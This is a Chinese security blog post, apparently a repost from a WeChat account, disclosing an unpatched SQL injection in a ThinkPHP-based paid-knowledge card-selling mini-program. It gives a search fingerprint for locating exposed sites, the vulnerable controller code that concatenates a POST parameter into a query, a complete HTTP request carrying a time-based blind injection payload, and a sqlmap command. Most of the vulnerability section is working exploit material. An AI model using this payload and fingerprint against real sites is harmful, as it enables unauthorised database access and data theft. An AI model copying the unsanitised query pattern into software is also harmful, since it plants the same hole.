某知识付费纯净发卡小程序系统存在SQL注入漏洞

admin 2024年10月10日17:25:54评论37 views字数 1828阅读6分5秒阅读模式
某知识付费纯净发卡小程序系统存在SQL注入漏洞

点击上方蓝字关注我们 并设为星标

0x00 前言

知识吾爱纯净版小程序源码,附详细视频+文字教程【小白可0基础搭建】

跟随教程步骤即可简单搭建属于自己的知识付费小程序,

实现支付变现+流量主收益,快速建立自己的IP

知识付费小程序源码包括以下功能:

会员管理:支持用户注册、登录、个人信息管理等功能,以及会员等级制度和积分系统。

订单管理:支持在线支付、查看订单详情、退款等功能,并能够生成结算报表和对账单。

内容管理:支持发布文章、视频、图片等多媒体内容,并能够设置不同的付费方式和价格。

数据统计:支持数据分析和用户行为跟踪,优化用户体验和提升营销效果。

此系统支持视频课程、音频课程、图文课程、专栏课程等,界面支持万能DIY装修,可以DIY出自己的风格。

Fofa指纹:"域名/skdjfdf"

某知识付费纯净发卡小程序系统存在SQL注入漏洞某知识付费纯净发卡小程序系统存在SQL注入漏洞某知识付费纯净发卡小程序系统存在SQL注入漏洞

框架:ThinkPHP 3.2.2 Debug:True

0x01 漏洞详情&复现

位于 /Application/App/Controller/ZmController.class.php 控制器中的leibiao方法直接POST传入tid参数,然后直接带到sql查询中,导致漏洞产生.

public function leibiao(){  $tid = $_POST['tid'];  $pagestart=$_POST['nextrow'];  $arr = M("reso")->where("tid={$tid} and status =1")->order("addtime DESC")->limit($pagestart,10)->select();  if ($arr)   {    echo json_encode(['code' => '1','msg'=>$arr], JSON_UNESCAPED_UNICODE);  }  else   {    echo json_encode(['code' => '0','msg'=>'已经没有了!'], JSON_UNESCAPED_UNICODE);  }}

Payload:

POST /app/zm/leibiao HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=q7pp0d3p3f5ileeqhnf8v5lnt1Connection: closeContent-Length: 55tid=(CASE WHEN (3711=3711) THEN SLEEP(5) ELSE 3711 END)

某知识付费纯净发卡小程序系统存在SQL注入漏洞

Python sqlmap.py -r a.txt --level=3 --dbms=mysql

某知识付费纯净发卡小程序系统存在SQL注入漏洞

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转

知识付费系统源码关注公众号发送 241010 获取!

顺便送10个Wiki社区邀请码,后台发送 邀请码 获取(手慢无)

某知识付费纯净发卡小程序系统存在SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):某知识付费纯净发卡小程序系统存在SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月10日17:25:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某知识付费纯净发卡小程序系统存在SQL注入漏洞http://cn-sec.com/archives/3249031.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息